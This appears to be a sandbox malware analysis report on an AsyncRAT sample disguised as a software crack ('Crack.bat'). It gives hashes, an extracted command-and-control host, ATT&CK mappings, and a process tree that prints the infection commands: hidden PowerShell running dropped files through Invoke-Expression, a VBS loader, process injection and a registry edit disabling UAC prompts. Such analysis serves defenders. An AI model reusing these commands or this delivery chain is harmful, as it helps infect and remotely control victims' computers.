asyncrat | 6ef295a0170d63f11af1366a75a38cec21adcdce6ec24bfe2a661eb10b754a8a

Analysis

max time kernel
90s
max time network
154s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
26/01/2025, 23:25

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

lossless scaling/Registration ('Crack')/Crack.bat
Size

14KB
MD5

8bfba49d351559387e43cb66ffeaafc1
SHA1

2a237525a6d906e264b36bb11bdd2d6b997b0a64
SHA256

6be519bd1dcfbfcf4d192d1b8df90434f3fad30792cc817ace43bbec5314f232
SHA512

5ff2536f48dea56d6f1b736875ce88858bd6c4b4b68ae89ce9690b11f9983b4b41882757c6f8f4615e84c1bf782550c82fad1136779d076d198b7360dfdef41a
SSDEEP

384:re23N2+xMcYjLnGHXZYGJ+SbnnGxJ46QLGpbQusYrMTVOJwC9hc+tmsWSYd5Ajdn:re23N2+xMcYjTGHXZYGJ+SbnnGxJ46QC

Score

10^/10

asyncrat default defense_evasion discovery execution rat trojan

Malware Config

Extracted

Family

asyncrat

Version

A 14

Botnet

Default

3x3.casacam.net:303

Mutex

MaterxMutex_Egypt2

Attributes

delay
3
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat

UAC bypass 3 TTPs 1 IoCs

defense_evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1588	powershell.exe
4972	powershell.exe

Executes dropped EXE 3 IoCs

pid	Process
972	RAR.exe
980	Font.exe
3372	esentutl.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1588 set thread context of 2824	1588	powershell.exe	92

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Font.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aspnet_compiler.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings	powershell.exe

Runs net.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2824	aspnet_compiler.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
4972	powershell.exe
4972	powershell.exe
4972	powershell.exe
1588	powershell.exe
1588	powershell.exe
3372	esentutl.exe
3372	esentutl.exe
2824	aspnet_compiler.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	4972	powershell.exe
Token: SeDebugPrivilege	1588	powershell.exe
Token: SeDebugPrivilege	3372	esentutl.exe
Token: SeDebugPrivilege	2824	aspnet_compiler.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2824	aspnet_compiler.exe

Suspicious use of WriteProcessMemory 33 IoCs

description	pid	Process	procid_target
PID 3504 wrote to memory of 1392	3504	cmd.exe	78
PID 3504 wrote to memory of 1392	3504	cmd.exe	78
PID 1392 wrote to memory of 4520	1392	net.exe	79
PID 1392 wrote to memory of 4520	1392	net.exe	79
PID 3504 wrote to memory of 3548	3504	cmd.exe	80
PID 3504 wrote to memory of 3548	3504	cmd.exe	80
PID 3504 wrote to memory of 4972	3504	cmd.exe	81
PID 3504 wrote to memory of 4972	3504	cmd.exe	81
PID 4972 wrote to memory of 4812	4972	powershell.exe	82
PID 4972 wrote to memory of 4812	4972	powershell.exe	82
PID 4972 wrote to memory of 972	4972	powershell.exe	83
PID 4972 wrote to memory of 972	4972	powershell.exe	83
PID 4972 wrote to memory of 980	4972	powershell.exe	85
PID 4972 wrote to memory of 980	4972	powershell.exe	85
PID 4972 wrote to memory of 980	4972	powershell.exe	85
PID 4972 wrote to memory of 720	4972	powershell.exe	86
PID 4972 wrote to memory of 720	4972	powershell.exe	86
PID 4972 wrote to memory of 1504	4972	powershell.exe	87
PID 4972 wrote to memory of 1504	4972	powershell.exe	87
PID 720 wrote to memory of 1588	720	WScript.exe	88
PID 720 wrote to memory of 1588	720	WScript.exe	88
PID 3504 wrote to memory of 5004	3504	cmd.exe	90
PID 3504 wrote to memory of 5004	3504	cmd.exe	90
PID 980 wrote to memory of 3372	980	Font.exe	91
PID 980 wrote to memory of 3372	980	Font.exe	91
PID 1588 wrote to memory of 2824	1588	powershell.exe	92
PID 1588 wrote to memory of 2824	1588	powershell.exe	92
PID 1588 wrote to memory of 2824	1588	powershell.exe	92
PID 1588 wrote to memory of 2824	1588	powershell.exe	92
PID 1588 wrote to memory of 2824	1588	powershell.exe	92
PID 1588 wrote to memory of 2824	1588	powershell.exe	92
PID 1588 wrote to memory of 2824	1588	powershell.exe	92
PID 1588 wrote to memory of 2824	1588	powershell.exe	92

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\lossless scaling\Registration ('Crack')\Crack.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3504
- C:\Windows\system32\net.exe
  net session
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1392
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 session
    3⤵
    PID:4520
- C:\Windows\system32\xcopy.exe
  xcopy "C:\Users\Admin\AppData\Local\Temp\lossless scaling\Registration ('Crack')\\Data\en-US" "C:\Users\Public\IObitUnlocker" /E /H /C /I /Y
  2⤵
  PID:3548
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "& {Get-Content 'C:\Users\Public\IObitUnlocker\UK.dll' | Out-String | Invoke-Expression}"
  2⤵
  - UAC bypass
  - Command and Scripting Interpreter: PowerShell
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4972
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /query /tn administrator
    3⤵
    PID:4812
- - C:\Users\Public\IObitUnlocker\RAR.exe
    "C:\Users\Public\IObitUnlocker\RAR.exe" x -pahmad..123 -o+ C:\Users\Public\IObitUnlocker\EN.dll C:\Users\Public\IObitUnlocker\
    3⤵
    - Executes dropped EXE
    PID:972
- - C:\Users\Public\IObitUnlocker\BR\Font.exe
    "C:\Users\Public\IObitUnlocker\BR\Font.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:980
  - - C:\Users\Admin\AppData\Local\Microsoft\Windows\esentutl.exe
      "C:\Users\Admin\AppData\Local\Microsoft\Windows\esentutl.exe"
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3372
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Public\IObitUnlocker\Loader.vbs"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:720
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass iex([IO.File]::ReadAllText('C:\Users\Public\IObitUnlocker\Report.ps1'))
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1588
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: AddClipboardFormatListener
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:2824
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /query /tn administrator
    3⤵
    PID:1504
- C:\Windows\system32\mode.com
  mode con: cols=80 lines=10
  2⤵
  PID:5004

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
22e796539d05c5390c21787da1fb4c2b

SHA1
55320ebdedd3069b2aaf1a258462600d9ef53a58

SHA256
7c6c09f48f03421430d707d27632810414e5e2bf2eecd5eb675fecf8b45a9a92

SHA512
d9cc0cb22df56db72a71504bb3ebc36697e0a7a1d2869e0e0ab61349bda603298fe6c667737b79bf2235314fb49b883ba4c5f137d002e273e79391038ecf9c09

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
f1dd882e18628bc3173525f100778a5a

SHA1
6e108181c7614325af250bc9de0e65731d2b4df6

SHA256
62d61cb4ea1054e83e384180c604d14304d8baebef3a97605fe4ab1edef8423c

SHA512
7f4b45e29e39d07e78b0f63b744a5ae9d49036393c58710662248932103b3fde1fba9a04077c6e3ddbd800a12ccc1c9b4aba357f299122dcea369862913b7be1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\esentutl.exe

Filesize
156KB

MD5
6981d94fbcc31ca50551300f5b4a96a3

SHA1
e38b3a74f2951f5480fb67acc75d41f3e2b4f70e

SHA256
8c19a90379611efc39c3e96529de2e82a99e3e049d36ef6563ec975836e47811

SHA512
b94e87c641009ab8206c91ede3e35ab3b65a94fa3be5f4ce7c8a2b17af018f03801086c850427f4d51f4867a3d0a85aaf58ece9fd7f6a36f68df29da430c8d5d

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mdx5q1rr.szv.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Public\IObitUnlocker\BR\Font.exe

Filesize
434KB

MD5
68c9ee084cc409309b116ec6aea890a8

SHA1
efd6aab18a08a63b146ad587d1fa08e0bb19bebc

SHA256
ef2cbfdfdd874c6c3ea11223b369fbd5f155d20c680ae1e59ac74e6f1bb74a9d

SHA512
9809477d42df7bbbaea04da5eda4a4f2ae3114b33541a4efd7003bab339d1c6ddf2f9a61b2ba781c0f5de82b030859c8ac76cbe697b296046227c1dc6b547a25

Download Submit
C:\Users\Public\IObitUnlocker\EN.dll

Filesize
181KB

MD5
a435e2fb659a3596b017f556b53fa09d

SHA1
c9ab6229bf239edac73593e0ffb53c1d9bb21686

SHA256
e7f03b61cff5526877ea3f26f613caf5dbdf9006d49b98c906de3051067d7512

SHA512
aa3fa16420e66bcdff349ba66791d7849a67d2ae720fdca4b3674ce2a8bffd7a1caae1a306c6533446950b0f8798d6cf7e37ec78ea199252028870fbc742f495

Download Submit
C:\Users\Public\IObitUnlocker\Loader.vbs

Filesize
308B

MD5
2993b76e0b0ba015caf654881638a0c0

SHA1
7fbd5f28fb2f6f948cbeb3c4dd5b0672bdfe4bcd

SHA256
0e131f595ef67c160de9727d9a92a84b50393e66dd242f330736b916e1bf20a3

SHA512
a61e0e7f92f0d78c27939ba21bdda6ff97503adc44e42a4b7eab3c4c1bea8acad4517b90db3430cabc237c2db01e60ab3a2a78e237ae01a896bd09aabba067cb

Download Submit
C:\Users\Public\IObitUnlocker\RAR.exe

Filesize
629KB

MD5
d3e9f98155c0faab869ccc74fb5e8a1e

SHA1
8e4feaad1d43306fdd8aa66efa443bca7afde710

SHA256
3e0fdb5c40336482dacef3496116053d7772a51720900141b3c6f35c6e9b351b

SHA512
2760c139ef276f406770675d89fb667f3369a9e1943a6eff2c18f391114018ad6fdce9daf0b499b18081ef22243ef04d74ff21cbd346eb31a1ddbcb79756697d

Download Submit
C:\Users\Public\IObitUnlocker\Report.ps1

Filesize
457KB

MD5
dd3f962ccc2f5b5f34700307e35138f8

SHA1
90d80df0ef716260a7d4ed466cf40caf966f0969

SHA256
e273b5a8cf3d3d37ff676251aa4f41e3726b45b3280f8bf84bf618ca05cca9bb

SHA512
619fba6cd9b8aae26db23f9cbd6db4870f969abd198d3fe8551703a1e2c46a9d1fd861f7b9462d82581b322209795c1e00762ebe31e0a1383c8a10df8e4a9eae

Download Submit
C:\Users\Public\IObitUnlocker\UK.dll

Filesize
5KB

MD5
3fffc04611766c3d49b9f0b74752a2b5

SHA1
c70e6e3b2cd315e900f6dfdd5828cbf75b903fe5

SHA256
7537dd03a875384bc79a7a21811e06ca97de3571631fc20b4b86b26baaafad9d

SHA512
3ded3c5712f93eaa75fc9fe9469a02ece5996b6574d63b7b3a5db86db74762631e35aacae519ea3d23862bdaffab5e786696eeb812b0d1ce7f14b78f4539b4d8

Download Submit
memory/980-65-0x00000000053F0000-0x0000000005446000-memory.dmp

Filesize
344KB

Download
memory/980-63-0x0000000005130000-0x000000000513A000-memory.dmp

Filesize
40KB

Download
memory/980-50-0x00000000051B0000-0x000000000524C000-memory.dmp

Filesize
624KB

Download
memory/980-51-0x0000000005800000-0x0000000005DA6000-memory.dmp

Filesize
5.6MB

Download
memory/980-49-0x0000000000620000-0x0000000000692000-memory.dmp

Filesize
456KB

Download
memory/980-52-0x0000000005250000-0x00000000052E2000-memory.dmp

Filesize
584KB

Download
memory/1588-84-0x0000028AEB270000-0x0000028AEB27A000-memory.dmp

Filesize
40KB

Download
memory/2824-85-0x0000000000400000-0x0000000000416000-memory.dmp

Filesize
88KB

Download
memory/2824-90-0x00000000071E0000-0x0000000007246000-memory.dmp

Filesize
408KB

Download
memory/3372-78-0x000000001C040000-0x000000001C0E6000-memory.dmp

Filesize
664KB

Download
memory/3372-83-0x0000000001050000-0x0000000001056000-memory.dmp

Filesize
24KB

Download
memory/3372-82-0x000000001CDF0000-0x000000001CE3C000-memory.dmp

Filesize
304KB

Download
memory/3372-81-0x0000000001000000-0x0000000001008000-memory.dmp

Filesize
32KB

Download
memory/3372-80-0x000000001CB40000-0x000000001CBDC000-memory.dmp

Filesize
624KB

Download
memory/3372-79-0x000000001C5D0000-0x000000001CA9E000-memory.dmp

Filesize
4.8MB

Download
memory/4972-18-0x00007FFF338B3000-0x00007FFF338B5000-memory.dmp

Filesize
8KB

Download
memory/4972-30-0x00007FFF338B0000-0x00007FFF34372000-memory.dmp

Filesize
10.8MB

Download
memory/4972-32-0x00007FFF338B3000-0x00007FFF338B5000-memory.dmp

Filesize
8KB

Download
memory/4972-33-0x00007FFF338B0000-0x00007FFF34372000-memory.dmp

Filesize
10.8MB

Download
memory/4972-48-0x00007FFF338B0000-0x00007FFF34372000-memory.dmp

Filesize
10.8MB

Download
memory/4972-29-0x00007FFF338B0000-0x00007FFF34372000-memory.dmp

Filesize
10.8MB

Download
memory/4972-28-0x00007FFF338B0000-0x00007FFF34372000-memory.dmp

Filesize
10.8MB

Download
memory/4972-19-0x00000180ECE20000-0x00000180ECE42000-memory.dmp

Filesize
136KB

Download